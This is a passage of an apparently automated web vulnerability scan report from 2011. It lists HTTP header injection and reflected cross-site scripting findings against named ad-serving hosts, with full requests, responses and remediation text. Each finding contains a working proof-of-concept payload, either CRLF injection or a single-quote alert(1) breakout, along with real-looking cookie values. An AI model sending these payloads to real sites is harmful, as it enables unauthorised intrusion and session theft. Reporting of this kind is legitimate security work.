1.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1b9c5%0d%0a8a1db01b318 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ABV&si=13015&pi=L&xs=3&pu=http%253A//today.msnbc.msn.com/id/42953716/ns/today-books/%253Fifu%253D%2526cmmiss%253D-1%2526cmkw%253D&df=1&v=5.5&cb=56991 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; Tsid=0^1304955421^1304957226|18181^1304955421^1304957226; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; N=2:cce56ea51bb938bc8d726cc79d6aee7f,cce56ea51bb938bc8d726cc79d6aee7f1b9c5%0d%0a8a1db01b318; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:20 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:18:20 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:03:20 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561800; path=/; expires=Mon, 16-May-11 16:03:20 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304958800|18181^1304955421^1304957226|13015^1304957000^1304958800; path=/; expires=Mon, 09-May-11 16:33:20 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:cce56ea51bb938bc8d726cc79d6aee7f1b9c5
8a1db01b318
,a847d6095e047baa644f1ef7d852edf7; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|
...[SNIP]...

1.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload ee445%0d%0a5cd11e0d9a was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ABV&si=ee445%0d%0a5cd11e0d9a&pi=L&xs=3&pu=http%253A//today.msnbc.msn.com/id/42953716/ns/today-books/%253Fifu%253D%2526cmmiss%253D-1%2526cmkw%253D&df=1&v=5.5&cb=56991 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; Tsid=0^1304955421^1304957226|18181^1304955421^1304957226; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; N=2:cce56ea51bb938bc8d726cc79d6aee7f,cce56ea51bb938bc8d726cc79d6aee7f; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:19 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:18:19 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:03:19 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561799; path=/; expires=Mon, 16-May-11 16:03:19 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304958799|18181^1304955421^1304957226|ee445
5cd11e0d9a
^1304956999^1304958799; path=/; expires=Mon, 09-May-11 16:33:19 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:cce56ea51bb938bc8d726cc79d6aee7f,a847d6095e047baa644f1ef7d852edf7; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|
...[SNIP]...

2. Cross-site scripting (reflected)
There are 93 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158f4'-alert(1)-'425ad1b248f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008158f4'-alert(1)-'425ad1b248f/be_ent;sz=728x90;ord=957008422? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:35 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008158f4'-alert(1)-'425ad1b248f/be_ent;sz=728x90;net=q1;ord=957008422;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 128ac'-alert(1)-'056ec58c537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent128ac'-alert(1)-'056ec58c537;sz=728x90;ord=957008422? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent128ac'-alert(1)-'056ec58c537;sz=728x90;net=q1;ord=957008422;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83823'-alert(1)-'816447c14fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent;sz=728x90;ord=957008422?&83823'-alert(1)-'816447c14fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:35 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422?&83823'-alert(1)-'816447c14fd=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdb7e'-alert(1)-'a2981bf4958 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent;sz=728x90;ord=957008422?fdb7e'-alert(1)-'a2981bf4958 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:03:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:34 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422?fdb7e'-alert(1)-'a2981bf4958;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.5. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50caf'-alert(1)-'0a4d50628ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.600850caf'-alert(1)-'0a4d50628ab/be_life;sz=728x90;ord=957064653? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:42 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.600850caf'-alert(1)-'0a4d50628ab/be_life;sz=728x90;net=q1;ord=957064653;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.6. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb04b'-alert(1)-'d57cf2cc2f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_lifefb04b'-alert(1)-'d57cf2cc2f8;sz=728x90;ord=957064653? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:04:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:43 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_lifefb04b'-alert(1)-'d57cf2cc2f8;sz=728x90;net=q1;ord=957064653;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.7. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2796f'-alert(1)-'6553dc1d4e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_life;sz=728x90;ord=957064653?&2796f'-alert(1)-'6553dc1d4e1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:42 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653?&2796f'-alert(1)-'6553dc1d4e1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.8. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8e'-alert(1)-'337d27fc70 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_life;sz=728x90;ord=957064653?34c8e'-alert(1)-'337d27fc70 HTTP/1.1
